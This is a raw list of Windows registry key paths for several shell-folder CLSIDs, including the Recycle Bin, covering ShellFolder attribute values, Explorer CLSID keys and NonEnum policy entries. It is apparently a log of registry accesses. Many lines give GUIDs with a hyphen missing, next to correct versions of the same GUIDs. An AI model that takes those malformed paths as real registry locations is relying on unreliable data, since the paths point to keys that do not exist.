HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F0800AA002F954E}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F0800AA002F954E}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F0800AA002F954E}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F0800AA002F954E}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F0800AA002F954E}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{645FF040-5081-101B-9F08-00AA002F954E}
HKEY_CLASSES_ROOT\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{26EE0668-A00A-44D7-9371BEB064C98683}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{26EE0668-A00A-44D7-9371-BEB064C98683}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{26EE0668-A00A-44D7-9371-BEB064C98683}
HKEY_CLASSES_ROOT\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C55595FE6B30EE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C55595FE6B30EE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C55595FE6B30EE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C55595FE6B30EE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C55595FE6B30EE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{59031A47-3F72-44A7-89C5-5595FE6B30EE}
HKEY_CLASSES_ROOT\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{031E4825-7B94-4DC3-B131E946B44C8DD5}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{031E4825-7B94-4DC3-B131-E946B44C8DD5}
HKEY_CLASSES_ROOT\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{04731B67-D933-450A-90E64ACD2E9408FE}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{04731B67-D933-450A-90E6-4ACD2E9408FE}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{04731B67-D933-450A-90E6-4ACD2E9408FE}
HKEY_CLASSES_ROOT\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{0875DCB6-C686-4243-9432ADCCF0B9F2D7}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}
HKEY_CLASSES_ROOT\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{11016101-E366-4D22-BC064ADA335C892B}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{11016101-E366-4D22-BC06-4ADA335C892B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{11016101-E366-4D22-BC06-4ADA335C892B}
HKEY_CLASSES_ROOT\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\UseDropHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\WantsFORPARSING
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\WantsParseDisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\QueryForOverlay
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\MapNetDriveVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\QueryForInfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder\HideInWebView
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\HideOnDesktopPerUser
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\WantsAliasedNotifications
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\WantsUniversalDelegate
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\NoFileFolderJunction
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\PinToNameSpaceTree
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{138508BC-1E03-49EA-9C8FEA9E1D05D65D}\ShellFolder\HasNavigationEnum
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\CLSID\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\NonEnum\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}
HKEY_CLASSES_ROOT\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\CallForAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB0299BB52D3FB8B}\ShellFolder\RestrictedAttributes
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\WantsFORDISPLAY
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\HideFolderVerbs
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\ShellFolder\UseDropHandler
